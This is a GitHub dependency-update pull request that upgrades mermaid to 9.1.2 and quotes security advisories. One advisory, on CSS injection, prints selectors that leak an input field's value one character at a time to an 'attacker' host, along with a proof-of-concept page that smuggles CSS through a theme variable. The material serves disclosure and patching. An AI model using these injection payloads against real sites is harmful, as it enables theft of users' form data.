Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency mermaid to v9 [security] #3661

Merged
merged 1 commit into from
Sep 27, 2022
Merged

fix(deps): update dependency mermaid to v9 [security] #3661

merged 1 commit into from
Sep 27, 2022

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Sep 27, 2022

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
mermaid 8.11.5 -> 9.1.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

Release Notes

knsv/mermaid

v9.1.2

Compare Source

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

  • Removal of vulnerability (#​2958) @​knsv
  • Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

  • Commit types
  • Multiple branches in sperate lanes
  • Theming

Other changes:

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.14.0

Compare Source

Release Notes

Main feature

  • Adding new more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#​2654)

Documentation updates

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.10

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.9

Compare Source

Release Notes

Changes to the functionality

Documentation changes

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.8

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.7

Compare Source

Release Notes

-Fix for vulnerability with links from actors in sequence diagrams

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Sep 27, 2022
@gitpod-io
Copy link

gitpod-io bot commented Sep 27, 2022

@manekenpix manekenpix merged commit efff34f into master Sep 27, 2022
@manekenpix manekenpix deleted the renovate/npm-mermaid-vulnerability branch September 27, 2022 23:28
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@manekenpix manekenpix manekenpix approved these changes

Assignees
No one assigned
Labels
dependencies Pull requests that update a dependency file
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@manekenpix